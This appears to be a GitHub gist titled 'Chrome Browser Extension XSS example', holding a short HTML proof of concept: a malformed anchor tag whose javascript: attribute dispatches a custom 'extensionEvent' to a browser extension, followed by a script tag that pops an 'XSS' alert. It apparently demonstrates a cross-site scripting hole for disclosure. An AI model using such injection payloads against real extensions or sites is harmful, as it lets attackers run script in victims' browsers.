Skip to content

Instantly share code, notes, and snippets.

@borski borski/gist:5265313
Last active Dec 15, 2015

Embed
What would you like to do?
Chrome Browser Extension XSS example
<a class="_company_extension" a="" href="#" #tinfoil"="" "javascript:var e = document.createEvent(&quot;CustomEvent&quot;); e.initCustomEvent(&quot;extensionEvent&quot;, true, true, {type: &quot;hash&quot;, value: &quot;#tinfoil&quot;}); document.body.dispatchEvent(e); return false;">
#tinfoil
</a><script>alert(‘XSS’)</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.